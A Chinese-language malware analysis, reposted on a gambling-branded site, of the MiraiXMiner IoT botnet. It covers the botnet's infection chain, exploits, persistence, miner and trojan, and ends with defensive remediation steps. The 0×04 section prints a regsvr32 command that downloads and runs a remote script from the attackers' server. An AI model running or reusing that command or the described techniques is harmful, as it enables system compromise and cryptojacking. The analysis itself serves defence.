具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

申博_新闻事件 申博 326次浏览 已收录 0个评论

近日,深信服安全团队跟踪到一新型的物联网僵尸网络,其融合了多种已知病毒家族的特点,包括Mirai物联网僵尸网络病毒、MyKings僵尸网络病毒、远控木马、挖矿等,传播方式包括永恒之蓝漏洞、闭路电视物联网设备漏洞、MSSQL漏洞、RDP爆破和Telnet爆破等。

深信服已将其命名为MiraiXMiner,并且制定了完善的防御措施。

0×01 攻击流程

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

1.病毒母体msinfo.exe通过注册服务&写入恶意代码到数据库的手段,实现持久化攻击。

2.后门模块up.rar经过分析发现为有名的BootKit远控木马。

3.u.exe通过篡改DNS配置文件达到劫持DNS的目的。

4.根据C&C命令从云端下载任意的攻击模块,此次的攻击模块为csrs.exe。

5.添加恶意特权账户admin$。

6.从黑客服务器下载三个子模块:后门模块、DNS劫持模块、净化&下载挖矿模块。

7.净化模块upsnew2.exe的功能很多,除了杀死同行病毒,添加自启动项以外,还会停止Windows自动更新服务,以更稳定地控制受害主机。最重要的,该模块后续还会不定期下载并执行挖矿程序。

8.使用扫描工具和Mirari攻击库对内网设备进行大范围攻击。

9.最后,母体msinfo.exe会连接云端,自动更新病毒,实时下载最新的攻击模块。

0×02 传播模块

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

扫描445端口,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

通过内置的masscan程序进行扫描,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

通过内置的nmap程序进行扫描行为,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

对扫描到的目标,相应的攻击行为,如下所示:

执行永恒之蓝攻击行为CrackerMS17010,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

攻击CCTV物联网设备漏洞CrackerCCTV,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

攻击MSSQL漏洞CrackerMSSQL,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

然后执行下面的数据库Payload命令过程,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

将如下恶意代码写入数据库存储过程中,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

恶意代码如下所示:

对RDP进行攻击CrackerRDP,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

对Telnet进行攻击CrackerTelnet,如下所示:
具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

0×03 创建admin$账号

从服务器上下载相应的配置文件,然后解密,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

然后解密出相应的XML文件,进行下载执行恶意程序操作,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

下载回来的CSRS是一个python脚本编写后生成的EXE,主要是一个Exploit,用于通过MS17010漏洞,添加帐号,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

添加之后的主机,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

执行MS17010漏洞攻击,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

攻击的参数,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

0×04 挖矿与远控木马

下载恶意程序,能过start regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txtscrobj.dll,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

解密出上面的XML脚本,如下所示:

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

Upsnew2释放远控木马item.dat以及c3.bat脚本。

c3.bat脚本功能如下:

清除其他病毒。

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

开启MSSQLSERVER。

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

在注册表以及任务计划中添加自启动。

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

关闭自动更新。

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

加载远控木马。

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

配置防火墙策略,关闭135、137、138、139、445端口,防止再被其他病毒感染。

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了

0×05 解决方案

1.隔离感染主机:已中毒计算机尽快隔离,关闭所有网络连接,禁用网卡。

2.切断传播途径:关闭潜在终端的SMB 445等网络共享端口,关闭异常的外联访问。深信服下一代防火墙用户,可开启IPS和僵尸网络功能(需升级到20181204版本),进行封堵。

3.查找攻击源:借助深信服安全感知平台检测内网攻击源。

4.查杀病毒:推荐使用深信服终端安全检测响应平台EDR进行查杀,病毒库需升级到20181204版本。

5.修补漏洞:打上永恒之蓝MS17-010等漏洞相关补丁。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明具备多病毒功能!MiraiXMiner物联网僵尸网络攻击要爆发了
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址